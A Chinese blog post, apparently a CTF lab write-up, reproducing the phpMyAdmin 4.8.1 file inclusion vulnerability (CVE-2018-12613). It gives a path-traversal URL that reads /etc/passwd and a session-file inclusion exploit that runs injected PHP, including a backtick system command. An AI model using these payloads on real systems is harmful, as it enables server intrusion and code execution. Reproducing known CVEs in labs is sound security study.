phpmyadmin 4.8.1 远程文件包含漏洞（CVE-2018-12613）漏洞复现

最新推荐文章于 2023-12-10 19:55:45 发布

imbia

最新推荐文章于 2023-12-10 19:55:45 发布

阅读量228

点赞数

分类专栏：安全 CTF WEB安全文章标签：安全

本文链接：https://blog.csdn.net/satasun/article/details/110821713

版权

安全同时被 3 个专栏收录

49 篇文章 6 订阅

订阅专栏

CTF

40 篇文章 1 订阅

订阅专栏

WEB安全

38 篇文章 0 订阅

订阅专栏

（CVE-2018-12613）

环境搭建

github传送门
 BUU传送门

poc

?target=db_sql.php%253f/../../../../../../../../etc/passwd

在这里插入图片描述

exp

这边利用包含session文件来获取

首先在SQL处执行

select '<?php phpinfo();?>';

在这里插入图片描述
复制下来cookie，构造payload

http://node3.buuoj.cn:27757/?target=db_sql.php%253f/../../../../../../../../tmp/sess_bb17e2919e913196389bffbc020a4cfa

在ubuntu下，session文件的存放位置为/tmp文件夹下，命名为sess_+cookie,例：

sess_bb17e2919e913196389bffbc020a4cfa

在这里插入图片描述

这里应该也可以执行系统命令，可以构造

select '<?php echo `ls`;?>';

按照上面的方法再来一次就可以获取到所有的目录然后进行包含。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

imbia

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
phpmyadmin 4.8.1 远程文件包含漏洞（CVE-2018-12613）漏洞复现

（CVE-2018-12613）环境搭建github传送门BUU传送门
复制链接

扫一扫

专栏目录

phpmyadmin 4.8.1 远程文件包含漏洞（CVE-2018-12613）

千寻的博客

03-14

1135

phpMyAdmin是phpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库，创建、删除、修改数据库表，执行SQL脚本命令等。攻击者可利用该漏洞包含（查看并可能执行）服务器上的文件。

[Vulhub]（CVE-2018-12613）phpmyadmin 4.8.1远程文件包含漏洞

weixin_45605352的博客

05-06

956

0x01 预备知识什么是文件包含漏洞？攻击者利用包含的特性，加上应用本身对文件（包含）控制不严格，最终造成攻击者进行任意文件包含。（注：包含的文件会被当成脚本文件来解析）一句话来说就是：文件包含并不属于漏洞，但是由于对包含进来的文件不可控，导致了文件包含漏洞的产生。本地文件包含叫做LFI，远程文件包含叫做RFI，默认PHP不开启远程文件包含。相关函数 include：PHP运行到include然后去调用被包含文件执行，如果包含文件不存在则报错，但是会继续往下执行； require：PHP在运

参与评论您还未登录，请先登录后发表或查看评论

phpmyadmin 4.8.1 Remote File Inclusion Vulnerability (CVE-2018-12613)漏洞复现

qq_43200143的博客

01-29

307

漏洞利用过程： vulhub.org docker环境启动后 1.访问 http://your-ip:8080 访问phpmyadmin。配置的是config模式，无需输入密码，直接登录test账户 2.访问http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 即可包含本地文件还可以进行getshell 思路：把webshell写入到数据.

phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613 漏洞复现

Senimo

12-11

1410

漏洞复现 phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613 APP：phpMyAdmin 4.8.1 CVE：CVE-2018-12613 类型：远程文件包含 下载phpMyAdmin 4.8.1源码漏洞问题出现在index.php页面55~63： // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_str

红队攻防实战之phpmyadmin-RCE集锦

最新发布

自强不息

12-10

942

世界上只有一种真正的英雄主义，那就是认清了生活的真相后，仍然热爱她

phpMyAdmin要嵌入到已有的界面

bjx18356163055的博客

02-13

481

phpMyAdmin 是一个以PHP为基础，以Web-Base方式架构在网站主机上的MySQL的数据库管理工具，让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径，尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行，但是您可以在任何地方使用这些程式产生的HTML页面，

phpmyadmin 远程文件包含漏洞（CVE-2018-12613） - tdcoming'blog QQ group 906

08-04

漏洞背景背景介绍phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具…阅读数 156博文CVE-2018-12613 --- 本地文件包含造成

phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源

03-05

phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源

Phpmyadmin后台代码执行CVE-2016-5734_poc

09-30

CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ，意即phpMyAdmin认证用户的远程代码执行，根据描述可知受影响的phpMyAdmin所有的 4.6.x 版本（直至 4.6.3），4.4.x ...

phpMyAdmin-4.6.6

04-06

phpMyAdmin-4.6.6-all-languages

phpMyAdmin 常见漏洞利用记录

The current road is different, love needs to distinguish between right and wrong

11-26

2463

目录简介 phpmyadmin版本信息获取 phpmyadmin密码爆破 phpmyadmin文件写入 phpmyadmin日志写shell phpmyadmin版本漏洞 phpmyadmin 2.x版本反序列化漏洞任意文件读取（wooyun-2016-199433） CVE-2016-5734 RCE命令执行 CVE-2018-12613 文件包含 结语简介 phpMyAdmin 是一个以PHP为基础，以WebBase方式架构在网站主机上的MySQL的数据库...

phpMyAdmin(LOAD DATA INFILE) 任意文件读取漏洞（测试）

cj_Hydra's Blog

04-23

1478

前言：最近在做ctf题时发现关于mysql任意文件读取漏洞的考点非常频繁，而且一直都朦胧不清，也没去学习，在不久前的DDCTF和国赛，还有最近的Nu1lCTF中都考到了这个点，利用Load data infile语法。在mysql客户端登陆mysql服务端后，客户端执行语句Load data local infile ‘/etc/passwd’ into table proc;，从而可以导致my...

phpmyadmin 0day exp

weixin_34014277的博客

07-13

245

虽然还是很鸡肋（要求根目录下存在config文件夹且可写），不过好很多了。可以无视session.auto_start配置了。 #!/usr/bin/php <?php print_r(' +---------------------------------------------------------------------------+ pma...

phpMyAdmin 漏洞小集合

SoulCat

08-07

5576

phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞（CVE-2016-5734）+4.8.1 远程文件包含漏洞（CVE-2018-12613）有情有义又是无米之炊，无情无义却是饕餮盛宴. 远程代码执行漏洞（CVE-2016-5734） phpMyAdmin是phpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库，创建、删除、修...

phpMyAdmin Transformation 任意文件包含漏洞 (需登录PMASA-2018-6/CVE-2018-19968)

蜡笔小新说安全的博客

06-23

311

phpMyAdmin Transformation 任意文件包含漏洞 (需登录) 2018年12月07日 phpMyAdmin 发布安全公告PMASA-2018-6修复了一个由Transformation特性引起的本地文件读取漏洞，影响4.8.0~4.8.3版本，CVE编号CVE-2018-19968。这是一个需要登陆利用的漏洞，首先需要实现登陆，在已只用户名和密码的情况下我们先登陆查看查看网页情况，先实现手工注入再编写exp脚本，我们实验的是一个已经搭建好的靶机地址为：靶机登陆后查看第一步：创

CVE-2018-12613[远程文件包含漏洞]复现

L1ni01

12-01

2470

CVE-2018-12613[远程文件包含漏洞]复现 0x00漏洞介绍攻击者利用发现在服务器上包含（查看和潜在执行）文件的漏洞。该漏洞来自一部分代码，其中页面在phpMyAdmin中被重定向和加载，以及对白名单页面进行不正确的测试。攻击者必须经过身份验证，但在这些情况下除外： $ cfg [‘AllowArbitraryServer’] = true：攻击者可以指定他/她已经控制的任何主机，并在phpMyAdmin上执行任意代码； $ cfg [‘ServerDefault’] = 0：这会绕过登录并

CVE-2018-8120 Microsoft Windows提权漏洞 Exp

weixin_34290000的博客

05-20

602

CVE-2018-8120 Windows LPE exploit Supports both x32 and x64. Tested on: Win7 x32, Win7 x64, Win2008 x32, Win2008 R2 x32, Win2008 R2 x64. Usage CVE-2018-8120 exploit Usage:...

PHPmyadmin漏洞和拿shell

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交